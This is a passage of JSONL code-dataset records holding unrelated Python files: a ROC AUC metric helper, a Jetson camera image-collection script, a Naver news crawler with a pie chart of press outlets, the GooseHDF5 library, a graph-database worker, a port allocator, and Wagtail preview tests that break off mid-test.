{}\n for i in range(len(labels)):\n lb = 
LabelBinarizer()\n y_true_i = y_true.copy()\n y_true_i[y_true != i] = len(labels) + 1\n y_true_i = lb.fit_transform(y_true_i)\n y_pred_i = y_pred.copy()\n y_pred_i[y_pred != i] = len(labels) + 1\n y_pred_i = lb.transform(y_pred_i)\n roc_auc_score_d[labels[i]] = roc_auc_score(y_true_i, y_pred_i, average = 'micro')\n return roc_auc_score_d\n","sub_path":"fast_bert/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":7331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"283848498","text":"\ngst_str = (\"nvarguscamerasrc ! video/x-raw(memory:NVMM), width=(int)480, height=(int)360, format=(string)NV12, framerate=(fraction)60/1 ! nvvidconv flip-method=0 ! video/x-raw, width=(int)480, height=(int)360, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink\")\n#gst_str = (\"nvarguscamerasrc ! video/x-raw(memory:NVMM), width=(int)640, height=(int)480, format=(string)NV12, framerate=(fraction)60/1 ! nvvidconv flip-method=0 ! video/x-raw, width=(int)640, height=(int)480, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink\")\n\n\nimport cv2\nimport numpy as np\nimport datetime\nimport time\nimport os\nfrom uuid import uuid1\nimport sys\n\nblocked_dir = 'dataset/blocked'\nfree_dir = 'dataset/free'\nfree_count = 0\t\nblocked_count = 0\n\nbExit = 0\n\nsave_block=0 # 0: free, 1:block\n\ndef filename_free():\n global free_dir, free_count\n free_count= len(os.listdir(free_dir))\n image_path = os.path.join(free_dir, str(uuid1()) + '.jpg')\n return image_path\n \ndef filename_blocked():\n global blocked_dir, blocked_count\n blocked_count= len(os.listdir(blocked_dir))\n image_path = os.path.join(blocked_dir, str(uuid1()) + '.jpg')\n return image_path\n\ndef imageCopy(src):\n return np.copy(src)\n\ndef Video(openpath):\n \n cap = cv2.VideoCapture(openpath)\n if cap.isOpened():\n print(\"Video Opened\")\n else:\n print(\"Video Not Opened\")\n print(\"Program Abort\")\n exit()\n fps = cap.get(cv2.CAP_PROP_FPS)\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fourcc = int(cap.get(cv2.CAP_PROP_FOURCC))\n\n cv2.namedWindow(\"Input\", cv2.WINDOW_GUI_EXPANDED)\n print(save_block)\n if save_block == '1':\n print(\"push s button to save blocked image.\")\n else:\n print(\"push s button to save free image.\")\n\n try:\n while cap.isOpened() and bExit == 0:\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret:\n frame = cv2.resize(frame, dsize=(224, 224), interpolation=cv2.INTER_AREA)\n cv2.imshow(\"Input\", frame)\n else:\n break\n \n if cv2.waitKey(int(1000.0/fps)) & 0xFF == ord('s'):\n if save_block == '1':\n filename = filename_blocked()\n else:\n filename = filename_free()\n\n print(filename)\n cv2.imwrite(filename, frame)\n \n except KeyboardInterrupt: \n print(\"key int\")\n cap.release()\n cv2.destroyAllWindows()\n time.sleep(0.5)\n return\n\t\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n return\n \nif __name__==\"__main__\":\n\n save_block = sys.argv[1]\n\n\n try:\n os.makedirs(free_dir)\n os.makedirs(blocked_dir)\n except FileExistsError:\n print('Directories not created becasue they already exist')\n\n Video(gst_str)\n","sub_path":"CollisionAvoidance/fca_data_collection.py","file_name":"fca_data_collection.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"557964654","text":"import 
csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport collections\n\n# the lines below keep Korean text in matplotlib from rendering as broken glyphs\nimport platform\nif platform.system() == 'Darwin': # macOS\n plt.rc('font', family='AppleGothic') \nplt.rcParams['axes.unicode_minus'] = False # fix broken minus signs when using a Korean font\n\n\n# a User-Agent header must be supplied\nheaders = {\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"}\n\n# read the search term and the first/last result pages to crawl\nquery = input(\"Enter a search term: \")\npage1 = int(input(\"Enter the first page: \"))\npage2 = int(input(\"Enter the last page: \"))\n\n# save the crawled results to a csv file\nfilename = f\"{query}.csv\"\nf = open(filename, \"w\", encoding = \"utf8\", newline=\"\")\nwriter = csv.writer(f)\n\nabcd_title = [\"Title\", \"Link\", \"Press\"]\nwriter.writerow(abcd_title)\n\n# crawling loop; articles are sorted newest first\noffice_list = []\nfor first in range(page1, page2+1): # iterate from the first page to the last\n url = f\"https://search.naver.com/search.naver?where=news&sm=tab_pge&query={query}&sort=1&photo=0&field=0&pd=0&ds=&de=&mynews=0&office_type=0&office_section_code=0&news_office_checked=&nso=so:dd,p:all,a:all&start={first*10-9}\"\n\n res = requests.get(url, headers=headers)\n res.raise_for_status()\n soup = BeautifulSoup(res.text, \"lxml\")\n\n news_area = soup.find_all(\"div\", attrs={\"class\":\"news_area\"})\n for i in news_area:\n title = i.find(\"a\", attrs={\"class\":\"news_tit\"}).get_text()\n link = i.find(\"a\", attrs={\"class\":\"news_tit\"})[\"href\"]\n press = i.find(\"a\", attrs={\"class\":\"info press\"}).stripped_strings\n \n for k in press:\n # \"언론사 선정\" is Naver's \"selected by press\" badge; skip it and keep the outlet name\n if k == \"언론사 선정\":\n continue\n else:\n m = k\n office_list.append(m)\n\n list1 = [title,link,m]\n writer.writerow(list1)\n print(list1)\n\n# visualization starts here\ndict1 = {}\ndict1 = collections.Counter(office_list)\n\n\noffice_name = list(dict1)\noffice_value = list(dict1.values())\n\n\nplt.pie(office_value, labels=office_name, autopct='%.1f%%')\nplt.legend(office_name, loc =(1.15, 0.0))\nplt.title(f\"Share of press outlets for search term '{query}'\")\nplt.show()\n\n# TODO:\n# use enumerate to add an index for each article in the csv file\n# tidy up the pie chart - sort slices by size, show counts per slice, improve readability\n\n","sub_path":"keyword.py","file_name":"keyword.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584960386","text":"import warnings\n\nimport h5py\nimport numpy as np\n\nfrom ._version import version # noqa: F401\nfrom ._version import version_tuple # noqa: F401\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef abspath(path):\n r\"\"\"\n Return absolute path.\n\n :param str path: A HDF5-path.\n :return: The absolute path.\n \"\"\"\n\n import posixpath\n\n return posixpath.normpath(posixpath.join(\"/\", path))\n\n\ndef join(*args, root=False):\n r\"\"\"\n Join path components.\n\n :param list args: Piece of a path.\n :return: The concatenated path.\n \"\"\"\n\n import posixpath\n\n lst = []\n\n for i, arg in enumerate(args):\n if i == 0:\n lst += [arg]\n else:\n lst += [arg.strip(\"/\")]\n\n if root:\n return posixpath.join(\"/\", *lst)\n\n return posixpath.join(*lst)\n\n\ndef getdatasets(data, root=\"/\"):\n r\"\"\"\n Iterator to traverse all datasets in HDF5 file.\n\n :param h5py.File data: A HDF5-archive.\n :param str root: Start from a certain point along the path-tree.\n :return: Iterator.\n\n :example:\n\n .. 
code-block:: python\n\n with h5py.File('...', 'r') as data:\n\n # loop over all datasets\n for path in GooseHDF5.getdatasets(data):\n print(path)\n\n # get a set of all datasets\n paths = set(GooseHDF5.getdatasets(data))\n\n # get a list of all datasets\n paths = list(GooseHDF5.getdatasets(data))\n\n Read more in `this answer `_.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path)\n\n # ---------------------------------------------\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root)\n\n\ndef getpaths(data, root=\"/\", max_depth=None, fold=None):\n r\"\"\"\n Iterator to traverse all datasets in HDF5 file.\n One can choose to fold (not traverse deeper than):\n\n - Groups deeper than a certain ``max_depth``.\n - A (list of) specific group(s).\n\n :param h5py.File data: A HDF5-archive.\n :param str root: Start from a certain point along the path-tree.\n :param int max_depth: Set a maximum depth beyond which groups are folded.\n :param list fold: Specify groups that are folded.\n :return: Iterator.\n\n :example:\n\n Consider this file:\n\n .. code-block:: bash\n\n /path/to/first/a\n /path/to/first/b\n /data/c\n /data/d\n /e\n\n Calling:\n\n .. code-block:: python\n\n with h5py.File('...', 'r') as data:\n\n for path in GooseHDF5.getpaths(data, max_depth=2, fold='/data'):\n print(path)\n\n Will print:\n\n .. code-block:: bash\n\n /path/to/...\n /data/...\n /e\n\n The ``...`` indicate that it concerns a folded group, not a dataset.\n Here, the first group was folded because of the maximum depth, and the second because it was\n specifically requested to be folded.\n \"\"\"\n\n if max_depth and fold:\n return _getpaths_fold_maxdepth(data, root, fold, max_depth)\n\n if max_depth:\n return _getpaths_maxdepth(data, root, max_depth)\n\n if fold:\n return _getpaths_fold(data, root, fold)\n\n return _getpaths(data, root)\n\n\ndef _getpaths(data, root):\n r\"\"\"\n Specialization for :py:func:`getpaths`.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path)\n\n # ---------------------------------------------\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root)\n\n\ndef _getpaths_maxdepth(data, root, max_depth):\n r\"\"\"\n Specialization for :py:func:`getpaths` such that:\n\n - Groups deeper than a certain maximum depth are folded.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix, max_depth):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif len(path.split(\"/\")) - 1 >= max_depth:\n yield path + \"/...\"\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path, max_depth)\n\n # ---------------------------------------------\n\n if isinstance(max_depth, str):\n max_depth = int(max_depth)\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root, max_depth)\n\n\ndef _getpaths_fold(data, root, fold):\n r\"\"\"\n Specialization for :py:func:`getpaths` such that:\n\n - Certain groups are 
folded.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix, fold):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif path in fold:\n yield path + \"/...\"\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path, fold)\n\n # ---------------------------------------------\n\n if isinstance(fold, str):\n fold = [fold]\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root, fold)\n\n\ndef _getpaths_fold_maxdepth(data, root, fold, max_depth):\n r\"\"\"\n Specialization for :py:func:`getpaths` such that:\n\n - Certain groups are folded.\n - Groups deeper than a certain maximum depth are folded.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix, fold, max_depth):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif len(path.split(\"/\")) - 1 >= max_depth:\n yield path + \"/...\"\n\n elif path in fold:\n yield path + \"/...\"\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path, fold, max_depth)\n\n # ---------------------------------------------\n\n if isinstance(max_depth, str):\n max_depth = int(max_depth)\n\n if isinstance(fold, str):\n fold = [fold]\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root, fold, max_depth)\n\n\ndef filter_datasets(data, paths):\n r\"\"\"\n From a list of paths, filter those paths that do not point to datasets.\n\n This function can, for example, be used in conjunction with :py:func:`getpaths`:\n\n .. code-block:: python\n\n with h5py.File('...', 'r') as data:\n\n datasets = GooseHDF5.filter_datasets(data,\n GooseHDF5.getpaths(data, max_depth=2, fold='/data'))\n\n :param h5py.File data: A HDF5-archive.\n :param list paths: List of HDF5-paths.\n :return: Filtered ``paths``.\n \"\"\"\n\n import re\n\n paths = list(paths)\n paths = [path for path in paths if not re.match(r\"(.*)(/\\.\\.\\.)\", path)]\n paths = [path for path in paths if isinstance(data[path], h5py.Dataset)]\n return paths\n\n\ndef verify(data, datasets, error=False):\n r\"\"\"\n Try reading each datasets.\n\n :param h5py.File data: A HDF5-archive.\n :param list datasets: List of HDF5-paths tp datasets.\n\n :param bool error:\n - If ``True``, the function raises an error if reading failed.\n - If ``False``, the function just continues.\n\n :return: List with only those datasets that can be successfully opened.\n \"\"\"\n\n ret = []\n\n for path in datasets:\n\n try:\n data[path][...]\n except: # noqa: E722\n if error:\n raise OSError(f'Error reading \"{path:s}\"')\n else:\n continue\n\n ret += [path]\n\n return ret\n\n\ndef exists(data, path):\n r\"\"\"\n Check if a path exists in the HDF5-archive.\n\n :param h5py.File data: A HDF5-archive.\n :param str path: HDF5-path.\n \"\"\"\n\n if path in data:\n return True\n\n return False\n\n\ndef exists_any(data, paths):\n r\"\"\"\n Check if any of the input paths exists in the HDF5-archive.\n\n :param h5py.File data: A HDF5-archive.\n :param list path: List of HDF5-paths.\n \"\"\"\n\n if isinstance(paths, str):\n paths = [paths]\n\n for path in paths:\n if exists(data, path):\n return True\n\n return False\n\n\ndef exists_all(data, paths):\n r\"\"\"\n Check if all of the input paths exists in the HDF5-archive.\n\n :arguments:\n\n :param h5py.File data: A HDF5-archive.\n :param list path: List of 
HDF5-paths.\n \"\"\"\n\n if isinstance(paths, str):\n paths = [paths]\n\n for path in paths:\n if not exists(data, path):\n return False\n\n return True\n\n\ndef copydatasets(source, dest, source_datasets, dest_datasets=None, root=None):\n r\"\"\"\n Copy all datasets from one HDF5-archive ``source`` to another HDF5-archive ``dest``.\n The datasets can be renamed by specifying a list of ``dest_datasets``\n (whose entries should correspond to the ``source_datasets``).\n\n In addition, a ``root`` (path prefix) for the destination datasets name can be specified.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n :param list source_datasets: List of dataset-paths in ``source``.\n :param list dest_datasets: List of dataset-paths in ``dest``, defaults to ``source_datasets``.\n :param str root: Path prefix for all ``dest_datasets``.\n \"\"\"\n\n import posixpath\n\n source_datasets = [abspath(path) for path in source_datasets]\n\n if not dest_datasets:\n dest_datasets = [path for path in source_datasets]\n\n if root:\n dest_datasets = [join(root, path, root=True) for path in dest_datasets]\n\n for dest_path in dest_datasets:\n if exists(dest, dest_path):\n raise OSError(f'Dataset \"{dest_path:s}\" already exists')\n\n # extract groups and sort based on depth\n groups = list({posixpath.split(path)[0] for path in dest_datasets})\n groups = [group for group in groups if group != \"/\"]\n groups = sorted(groups, key=lambda group: (group.count(\"/\"), group))\n\n # create groups\n for group in groups:\n if not exists(dest, group):\n dest.create_group(group)\n\n # copy datasets\n for source_path, dest_path in zip(source_datasets, dest_datasets):\n group = posixpath.split(dest_path)[0]\n source.copy(source_path, dest[group], posixpath.split(dest_path)[1])\n\n\ndef isnumeric(a):\n r\"\"\"\n Returns ``True`` is an array contains numeric values.\n\n :param array a: An array.\n :return: bool\n \"\"\"\n\n import numpy as np\n\n if type(a) == str:\n return False\n\n if np.issubdtype(a.dtype, np.number):\n return True\n\n return False\n\n\ndef _equal_value(a, b):\n\n import numpy as np\n\n if type(a) == str:\n if type(b) == str:\n return a == b\n else:\n return False\n\n if a.size != b.size:\n return False\n\n if np.issubdtype(a.dtype, np.floating):\n if not np.issubdtype(b.dtype, np.floating):\n return False\n if np.allclose(a, b):\n return True\n return False\n\n if np.issubdtype(a.dtype, np.integer):\n if not np.issubdtype(b.dtype, np.integer):\n return False\n if np.all(np.equal(a, b)):\n return True\n return False\n\n if a.dtype == np.bool_:\n if b.dtype != np.bool_:\n return False\n if np.all(np.equal(a, b)):\n return True\n return False\n\n if a.size == 1:\n if a[...] 
== b[...]:\n return True\n else:\n return False\n\n return list(a[...]) == list(b[...])\n\n\ndef _equal(a, b):\n\n if isinstance(a, h5py.Group) and isinstance(b, h5py.Group):\n return True\n\n if not isinstance(a, h5py.Dataset) or not isinstance(b, h5py.Dataset):\n raise OSError(\"Not a Dataset\")\n\n for key in a.attrs:\n if key not in b.attrs:\n return False\n if not _equal_value(a.attrs[key], b.attrs[key]):\n return False\n\n for key in b.attrs:\n if key not in a.attrs:\n return False\n\n return _equal_value(a, b)\n\n\ndef equal(source, dest, source_dataset, dest_dataset=None):\n r\"\"\"\n Check that a dataset is equal in both files.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n :param list source_datasets: List of dataset-paths in ``source``.\n :param list dest_datasets: List of dataset-paths in ``dest``, defaults to ``source_datasets``.\n \"\"\"\n\n if not dest_dataset:\n dest_dataset = source_dataset\n\n if source_dataset not in source:\n raise OSError(f'\"{source_dataset:s} not in {source.filename:s}')\n\n if dest_dataset not in dest:\n raise OSError(f'\"{dest_dataset:s} not in {dest.filename:s}')\n\n return _equal(source[source_dataset], dest[dest_dataset])\n\n\ndef allequal(source, dest, source_datasets, dest_datasets=None):\n r\"\"\"\n Check that all listed datasets are equal in both files.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n :param list source_datasets: List of dataset-paths in ``source``.\n :param list dest_datasets: List of dataset-paths in ``dest``, defaults to ``source_datasets``.\n \"\"\"\n\n if not dest_datasets:\n dest_datasets = [path for path in source_datasets]\n\n for source_dataset, dest_dataset in zip(source_datasets, dest_datasets):\n if not equal(source, dest, source_dataset, dest_dataset):\n return False\n\n return True\n\n\ndef copy_dataset(source, dest, paths, compress=False, double_to_float=False):\n r\"\"\"\n Copy a dataset from one file to another. 
This function also copies possible attributes.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n\n :type paths: str, list\n :param paths: (List of) HDF5-path(s) to copy.\n\n :param bool compress: Compress the destination dataset(s).\n :param bool double_to_float: Convert doubles to floats before copying.\n \"\"\"\n\n if not isinstance(paths, list):\n # wrap a single path in a list; list(paths) would split a string into characters\n paths = [paths]\n\n for path in paths:\n\n data = source[path][...]\n\n if data.size == 1 or not compress or not isnumeric(data):\n dest[path] = source[path][...]\n else:\n dtype = source[path].dtype\n if dtype == np.float64 and double_to_float:\n dtype = np.float32\n dset = dest.create_dataset(\n path, data.shape, dtype=dtype, compression=\"gzip\"\n )\n dset[:] = data\n\n for key in source[path].attrs:\n dest[path].attrs[key] = source[path].attrs[key]\n","sub_path":"GooseHDF5/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"536877390","text":"__author__ = 'Sagar'\nfrom pygraphdb.services.common.communicationservice import CommunicationService\nfrom pygraphdb.services.common.heartbeatservice import HeartBeatService\nimport configparser\n\nclass WorkerProcess(object):\n def __init__(self):\n super(WorkerProcess, self).__init__()\n self._name = None\n self._master_port = None\n self._master_hostname = None\n self._services = {}\n\n def init(self, config_path):\n config = configparser.ConfigParser(allow_no_value=True)\n config.read(config_path)\n self._name = config['Node']['Name']\n self._master_port = int(config['Node']['MasterNodePort'])\n self._master_hostname = config['Node']['MasterNodeHostname']\n\n def run(self):\n communication_service = CommunicationService(self._master_hostname, self._master_port, self._name, False)\n communication_service.start()\n self._services['CommunicationService'] = communication_service\n heartbeat_service = HeartBeatService(communication_service, 5)\n communication_service.register('HeartBeatService', heartbeat_service.get_queue())\n heartbeat_service.start()\n self._services['HeartBeatService'] = heartbeat_service","sub_path":"process/workerprocess.py","file_name":"workerprocess.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"463297420","text":"#!/usr/bin/env python3\n\nMAX_PORTS = 1 << 17 # let us support 128K ports\n\n# the minimum port number we can assign. should be a power of 2\n\nMIN_START_PORT = 1 << 13 \n\nMIN_PORT_BYTEARRAY_INDEX = MIN_START_PORT >> 3\nMAX_PORTS_BYTEARRAY_LEN = MAX_PORTS >> 3\n\nclass Ports(object):\n def __init__(self, ports):\n assert len(ports) == MAX_PORTS_BYTEARRAY_LEN\n self.ports = bytearray(ports)\n\n def assignFreePort(self, numports = 1, scanstart = MIN_START_PORT):\n \"\"\"returns the first free port number at or above scanstart and marks it as used; returns None when no port is free (numports is currently unused). 
\"\"\"\n \n if scanstart < MIN_START_PORT:\n scanstart = MIN_START_PORT\n\n ssindex = scanstart >> 3\n\n for index in range(ssindex, MAX_PORTS_BYTEARRAY_LEN):\n assert(index >= 0 and index < MAX_PORTS_BYTEARRAY_LEN)\n portbyte = self.ports[index]\n assert portbyte >= 0 and portbyte <= 255\n if portbyte == 255:\n continue\n\n bit = 0\n for bit in range(0, 8):\n if portbyte & (1 << bit):\n continue\n break\n \n port = (index << 3) + bit\n# print ('bit', bit, 'in byte', index, 'is available', 'port #', port, bin(portbyte))\n self.ports[index] |= (1 << bit)\n return port\n\n return None\n\n @classmethod\n def initPorts(cls):\n \"\"\" initializes a backend ports bitmap for use \"\"\"\n return bytearray(MAX_PORTS_BYTEARRAY_LEN)\n\nif __name__ == '__main__':\n ports = Ports.initPorts()\n ports = Ports(ports)\n for i in range(0, 10):\n print(ports.assignFreePort())\n","sub_path":"spmc/ports.py","file_name":"ports.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"463057218","text":"import datetime\nfrom functools import wraps\nfrom unittest import mock\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom freezegun import freeze_time\n\nfrom wagtail.admin.edit_handlers import FieldPanel, ObjectList, TabbedInterface\nfrom wagtail.admin.views.pages.preview import PreviewOnEdit\nfrom wagtail.core.models import Page\nfrom wagtail.tests.testapp.models import (\n EventCategory,\n EventPage,\n SimplePage,\n StreamPage,\n)\nfrom wagtail.tests.utils import WagtailTestUtils\n\n\nclass TestIssue2599(TestCase, WagtailTestUtils):\n \"\"\"\n When previewing a page on creation, we need to assign it a path value consistent with its\n (future) position in the tree. 
The naive way of doing this is to give it an index number\n one more than numchild - however, index numbers are not reassigned on page deletion, so\n this can result in a path that collides with an existing page (which is invalid).\n \"\"\"\n\n def test_issue_2599(self):\n homepage = Page.objects.get(id=2)\n\n child1 = Page(title=\"child1\")\n homepage.add_child(instance=child1)\n child2 = Page(title=\"child2\")\n homepage.add_child(instance=child2)\n\n child1.delete()\n\n self.login()\n post_data = {\n \"title\": \"New page!\",\n \"content\": \"Some content\",\n \"slug\": \"hello-world\",\n \"action-submit\": \"Submit\",\n }\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_add\",\n args=(\"tests\", \"simplepage\", homepage.id),\n )\n response = self.client.post(preview_url, post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"tests/simple_page.html\")\n self.assertContains(response, \"New page!\")\n\n # Check that the treebeard attributes were set correctly on the page object\n self.assertEqual(response.context[\"self\"].depth, homepage.depth + 1)\n self.assertTrue(response.context[\"self\"].path.startswith(homepage.path))\n self.assertEqual(response.context[\"self\"].get_parent(), homepage)\n\n\ndef clear_edit_handler(page_cls):\n def decorator(fn):\n @wraps(fn)\n def decorated(*args, **kwargs):\n # Clear any old EditHandlers generated\n page_cls.get_edit_handler.cache_clear()\n try:\n fn(*args, **kwargs)\n finally:\n # Clear the bad EditHandler generated just now\n page_cls.get_edit_handler.cache_clear()\n\n return decorated\n\n return decorator\n\n\nclass TestPreview(TestCase, WagtailTestUtils):\n fixtures = [\"test.json\"]\n\n def setUp(self):\n self.meetings_category = EventCategory.objects.create(name=\"Meetings\")\n self.parties_category = EventCategory.objects.create(name=\"Parties\")\n self.holidays_category = EventCategory.objects.create(name=\"Holidays\")\n\n self.home_page = Page.objects.get(url_path=\"/home/\")\n self.event_page = Page.objects.get(url_path=\"/home/events/christmas/\")\n\n self.user = self.login()\n\n self.post_data = {\n \"title\": \"Beach party\",\n \"slug\": \"beach-party\",\n \"body\": \"\"\"{\"entityMap\": {},\"blocks\": [\n {\"inlineStyleRanges\": [], \"text\": \"party on wayne\", \"depth\": 0, \"type\": \"unstyled\", \"key\": \"00000\", \"entityRanges\": []}\n ]}\"\"\",\n \"date_from\": \"2017-08-01\",\n \"audience\": \"public\",\n \"location\": \"the beach\",\n \"cost\": \"six squid\",\n \"carousel_items-TOTAL_FORMS\": 0,\n \"carousel_items-INITIAL_FORMS\": 0,\n \"carousel_items-MIN_NUM_FORMS\": 0,\n \"carousel_items-MAX_NUM_FORMS\": 0,\n \"speakers-TOTAL_FORMS\": 0,\n \"speakers-INITIAL_FORMS\": 0,\n \"speakers-MIN_NUM_FORMS\": 0,\n \"speakers-MAX_NUM_FORMS\": 0,\n \"related_links-TOTAL_FORMS\": 0,\n \"related_links-INITIAL_FORMS\": 0,\n \"related_links-MIN_NUM_FORMS\": 0,\n \"related_links-MAX_NUM_FORMS\": 0,\n \"head_counts-TOTAL_FORMS\": 0,\n \"head_counts-INITIAL_FORMS\": 0,\n \"head_counts-MIN_NUM_FORMS\": 0,\n \"head_counts-MAX_NUM_FORMS\": 0,\n \"categories\": [self.parties_category.id, self.holidays_category.id],\n \"comments-TOTAL_FORMS\": 0,\n \"comments-INITIAL_FORMS\": 0,\n \"comments-MIN_NUM_FORMS\": 0,\n \"comments-MAX_NUM_FORMS\": 1000,\n }\n\n def 
test_preview_on_create_with_m2m_field(self):\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_add\",\n args=(\"tests\", \"eventpage\", self.home_page.id),\n )\n response = self.client.post(preview_url, self.post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n # Check the user can refresh the preview\n preview_session_key = \"wagtail-preview-tests-eventpage-{}\".format(\n self.home_page.id\n )\n self.assertIn(preview_session_key, self.client.session)\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"tests/event_page.html\")\n self.assertContains(response, \"Beach party\")\n self.assertContains(response, \"
<li>Parties</li>\")\n        self.assertContains(response, \"<li>Holidays</li>\")\n\n    def test_preview_on_edit_with_m2m_field(self):\n        preview_url = reverse(\n            \"wagtailadmin_pages:preview_on_edit\", args=(self.event_page.id,)\n        )\n        response = self.client.post(preview_url, self.post_data)\n\n        # Check the JSON response\n        self.assertEqual(response.status_code, 200)\n        self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n        # Check the user can refresh the preview\n        preview_session_key = \"wagtail-preview-{}\".format(self.event_page.id)\n        self.assertIn(preview_session_key, self.client.session)\n\n        response = self.client.get(preview_url)\n\n        # Check the HTML response\n        self.assertEqual(response.status_code, 200)\n        self.assertTemplateUsed(response, \"tests/event_page.html\")\n        self.assertContains(response, \"Beach party\")\n        self.assertContains(response, \"
<li>Parties</li>\")\n        self.assertContains(response, \"<li>Holidays</li>\")\n\n    def test_preview_on_edit_expiry(self):\n        initial_datetime = timezone.now()\n        expiry_datetime = initial_datetime + datetime.timedelta(\n            seconds=PreviewOnEdit.preview_expiration_timeout + 1\n        )\n\n        with freeze_time(initial_datetime) as frozen_datetime:\n            preview_url = reverse(\n                \"wagtailadmin_pages:preview_on_edit\", args=(self.event_page.id,)\n            )\n            response = self.client.post(preview_url, self.post_data)\n\n            # Check the JSON response\n            self.assertEqual(response.status_code, 200)\n\n            response = self.client.get(preview_url)\n\n            # Check the HTML response\n            self.assertEqual(response.status_code, 200)\n\n            frozen_datetime.move_to(expiry_datetime)\n\n            preview_url = reverse(\n                \"wagtailadmin_pages:preview_on_edit\", args=(self.home_page.id,)\n            )\n            response = self.client.post(preview_url, self.post_data)\n            self.assertEqual(response.status_code, 200)\n            response = self.client.get(preview_url)\n            self.assertEqual(response.status_code, 200)\n\n    @clear_edit_handler(EventPage)\n    def test_preview_with_custom_edit_handler(self):\n        \"\"\"\n        The test is based on TestPreview.test_preview_on_create_with_m2m_field, except that the \"categories\"\n        FieldPanel is only visible to superusers. Non-superusers should not be able to set \"categories\" for\n        the preview.\n        \"\"\"\n\n        class SuperuserEventCategoriesObjectList(ObjectList):\n            def on_request_bound(self):\n                new_children = []\n                for child in self.children:\n                    # skip the \"categories\" FieldPanel for non-superusers\n                    if (\n                        isinstance(child, FieldPanel)\n                        and child.field_name == \"categories\"\n                        and not self.request.user.is_superuser\n                    ):\n                        continue\n\n                    new_child = child.bind_to(\n                        model=self.model,\n                        instance=self.instance,\n                        request=self.request,\n                        form=self.form,\n                    )\n                    new_children.append(new_child)\n                self.children = new_children\n\n        new_tabbed_interface = TabbedInterface(\n            [\n                SuperuserEventCategoriesObjectList(EventPage.content_panels),\n                ObjectList(EventPage.promote_panels),\n            ]\n        )\n\n        with mock.patch.object(\n            EventPage, \"edit_handler\", new=new_tabbed_interface, create=True\n        ):\n            # Non-superusers should not see categories panel, so even though \"post_data\" contains \"categories\",\n            # it should not be considered for the preview request.\n            self.login(username=\"siteeditor\", password=\"password\")\n\n            preview_url = reverse(\n                \"wagtailadmin_pages:preview_on_add\",\n                args=(\"tests\", \"eventpage\", self.home_page.id),\n            )\n            response = self.client.post(preview_url, self.post_data)\n\n            # Check the JSON 